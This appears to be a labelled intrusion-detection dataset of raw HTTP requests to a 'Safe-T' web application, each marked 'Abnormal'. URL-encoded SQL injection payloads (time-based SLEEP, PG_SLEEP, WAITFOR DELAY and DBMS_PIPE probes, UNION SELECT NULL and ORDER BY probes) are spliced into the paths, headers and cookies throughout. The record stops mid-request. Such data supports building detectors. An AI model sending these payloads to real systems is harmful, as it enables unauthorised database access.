GET /Safe-T/Webskin/DefaultWebskin/Style/Header.css HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/%29 %20 AND %20 SLEEP %28 5 %29 %20 AND %20 %28 %3D*/*;q=0.1Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/header.htmlCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/default.aspx HTTP/1.1Host: 192.168.4.%20 AND %20 SLEEP %28 5 %29-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: */*Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
POST /Safe-T/default.aspx/onAjaxRequest HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1X-Requested-With: %27 %29 %20 AND %20 SLEEP %28 5 %29 %20 AND %20 %28 %27 %27 %3D %27-Type: application/json; charset=utf-8Referer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 22Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Images/loading.gif HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Style/Main.%27 %20 AND %20 SLEEP %28 5 %29 %20 AND %20 %27 %27 %3D %27: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-3.1.1/fonts/glyphicons-halflings-regular.woff HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/font-woff2;q=1.0application/font-woff;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: %25 %27 %20 AND %20 SLEEP %28 5 %29 %20 AND %20 %27 %25 %27 %3D %27: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Tools/bootstrap-3.1.1/css/bootstrap.min.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/font-awesome-4.2.0/fonts/fontawesome-webfont.woff?v=4.2.0 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/%20 AND %20 SLEEP %28 5 %29 -- %20 Firefox/42.0Accept: application/font-woff2;q=1.0application/font-woff;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: identityDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/Tools/font-awesome-4.2.0/css/font-awesome.min.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
POST /Safe-T/default.aspx/onAjaxRequest HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/htmlapplication/xhtml+xmlapplication/xml;q=0.9*/*;q=0.8Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1X-Requested-With: XMLHttpRequestContent-Type: application/json; charset=utf-8Referer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 22Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=%29 %20 AND %20 %3D %28 SELECT %20 %20 FROM %20 PG_SLEEP %28 5 %29 %29 %20 AND %20 %28 %3D; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFoldersTree HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/%20 AND %20 %3D %28 SELECT %20 %20 FROM %20 PG_SLEEP %28 5 %29 %29 */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cacheContent-Length: 0,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 16Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%27 %29 %20 AND %20 %3D %28 SELECT %20 %20 FROM %20 PG_SLEEP %28 5 %29 %29 %20 AND %20 %28 %27 %27 %3D %27; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-%27 %20 AND %20 %3D %28 SELECT %20 %20 FROM %20 PG_SLEEP %28 5 %29 %29 %20 AND %20 %27 %27 %3D %27-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 27Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
GET /Safe-T/Webskin/DefaultWebskin/Tools/jstree-3.0.0/themes/default/32px.png HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: image/pngimage/*;q=0.8*/*;q=0.5Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Referer: https://192.168.4.109/Safe-T/Webskin/DefaultWebskin/%25 %27 %20 AND %20 %3D %28 SELECT %20 %20 FROM %20 PG_SLEEP %28 5 %29 %29 %20 AND %20 %27 %25 %27 %3D %27/jstree-3.0.0/themes/default/custom.cssCookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alive,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://%20 AND %20 %3D %28 SELECT %20 %20 FROM %20 PG_SLEEP %28 5 %29 %29 -- %20/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json %29 %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/%20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 -- */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .%27 %29 %20 WAITFOR %20 DELAY %20 %27 0%3A0%3A5 %27 --=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=29 %20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 %20 AND %20 %28 %3D; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/%27 %20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 %20 AND %20 %27 %27 %3D %27 HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: %29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23: https://%27 %20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 %20 AND %20 %27 %27 %3D %27.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; %27 %20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 %20 AND %20 %27 %27 %3D %27=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=%20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=%27 %29 %20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 %20 AND %20 %28 %27 %27 %3D %27: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/%25 %27 %20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 %20 AND %20 %27 %25 %27 %3D %27 text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/S%20 AND %20 %3D DBMS_PIPE.RECEIVE_MESSAGE %28 CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %7C%7C CHR %28 %29 %2C 5 %29 -- %20,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript%29 %20 ORDER %20 BY %20 1 %23 */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-%29 %20 UNION %20 ALL %20 SELECT %20 NULL %23: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 27Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript %29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %23 */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: %29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23 text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 25Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFilesInFolder HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json text/javascript */*; q=0.01Accept-Language: en-USen;q=0.5Accept-Encoding: gzip deflateDNT: 1Content-Type: application/json; charset=utf-8X-Requested-With: %29 %20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23HttpRequestReferer: https://192.168.4.109/Safe-T/default.aspxContent-Length: 26Cookie: clz02j6mgdqpzoey8i5010pz; SFTSId=dnsm0flp3iimy0oxjttymdys; .safeApiAuth=6AF734B51DC559EAB8F898DAB445D97910657850CFE6B9A2FEDC71F3468A4D3C51431F27F051215A2A743D6E854DC58AA0E0BE984E0A964A6802D81103FBAE4341BF760022F8309B8E7929C983B1B1D861D13572293091CB062ECAFB35F3CBF7ABBCC258C1031923DDA0ACD390CE0BB185E7F892; __tempRemoteIdentifier__=409a1cb3549f4f8b9f13430035208736Connection: keep-alivePragma: no-cacheCache-Control: no-cache,Abnormal
POST /Safe-T/default.aspx/getFolderContent HTTP/1.1Host: 192.168.4.109User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %23%20 UNION %20 ALL %20 SELECT %20 NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL %2C NULL 